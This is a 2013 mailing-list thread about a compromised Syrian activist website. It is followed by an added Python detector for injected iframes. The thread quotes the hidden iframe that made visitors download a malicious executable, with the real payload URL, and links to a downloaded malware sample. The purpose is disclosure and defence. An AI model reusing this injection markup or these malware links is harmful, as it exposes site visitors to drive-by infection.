[liberationtech] Syrian-martyrs.com website probably compromised by virus
KheOps
kheops at ceops.eu
Tue Jan 29 14:40:36 PST 2013
Hey,
On 29/01/2013 23:34, SiNA Rabbani wrote:
> This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
Yes, saw that too.
However, I don't find any precise description of its behaviour. Like,
what it does, if it opens any port, sends data to a C&C or whatever.
I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/
All the best,
>
> --SiNA
>
> SiNA Rabbani:
>> holy shit:
>>
>> <iframe name="I1" width="10" height="10"
>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>> border="0"
>> frameborder="0">
>>
>> :/ if you are running windows don't even go there!!!
>>
>> Andrew Lewis:
>>> I can get to this in 6 hours or so, maybe someone is willing to
>>> jump on this before then?
>>>
>>> -Andrew
>>>
>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>>>> Dear Libtech,
>>>>
>>>> We just saw that the website: http://www.syrian-martyrs.com
>>>> is probably compromised. Every page of the website contains an
>>>> iFrame which links to a .exe file which is detected as a virus
>>>> by antivirus software:
>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>
>>>> The fact that the HTML code is present at the bottom of each page makes
>>>> me think that the "index.php" page has been changed in a way
>>>> that makes that iFrame appear on every page of the website,
>>>> after the dynamic content.
>>>>
>>>> It also probably means that the attackers have some kind of
>>>> access to the server. My guess would be going to a PHP shell,
>>>> but I'm no expert in this.
>>>>
>>>> Any help, clue, investigation, would be very welcome :)
>>>>
>>>> Thank you, KheOps
>>>>
>>>> -- Unsubscribe, change to digest, or change password at:
>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
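A small detector for the kind of injected frame the quoted report describes, added here as an example and not code from the thread or from any of its participants: it parses a fetched page and flags iframes whose src is an executable, that are tiny, that load from a host other than the page's own, or that sit after the closing </html> (where something appended by a modified index.php would land). The sample page, the host names and the 10px threshold are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not the real site): normal content, then a 10x10
# iframe appended after </html>, as in the report. Host is a placeholder.
SAMPLE_PAGE = """<html><body><h1>News</h1><p>Dynamic content.</p></body></html>
<iframe name="I1" width="10" height="10"
src="http://malware-host.invalid/downloads/uploads/software/ActiveX.exe"
border="0" frameborder="0"></iframe>
"""

EXECUTABLE_EXTS = (".exe", ".scr", ".msi", ".com", ".bat", ".pif")
TINY_PX = 10  # frames this small are effectively invisible to the visitor


class IframeCollector(HTMLParser):
    """Collect every <iframe>, noting its line and whether it follows </html>."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((dict(attrs), self.html_closed, self.getpos()[0]))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True


def _px(value):
    """Parse a width/height attribute; None when absent or non-numeric."""
    try:
        return int(str(value).rstrip("px%"))
    except ValueError:
        return None


def find_suspicious_iframes(html, page_host):
    """Return [(line, src, [reasons])] for iframes showing drive-by traits."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs, after_html, line in parser.iframes:
        src = attrs.get("src") or ""
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(EXECUTABLE_EXTS):
            reasons.append("src points at an executable")
        w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
        if w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
            reasons.append("frame is tiny (%dx%d)" % (w, h))
        if parsed.hostname and parsed.hostname != page_host:
            reasons.append("src host %s differs from page host" % parsed.hostname)
        if after_html:
            reasons.append("iframe appears after </html>")
        if reasons:
            findings.append((line, src, reasons))
    return findings
```

Run it over every page of a site crawl rather than a single URL; the report's key observation was that the same frame appeared on every page, which points at a shared template rather than one edited file.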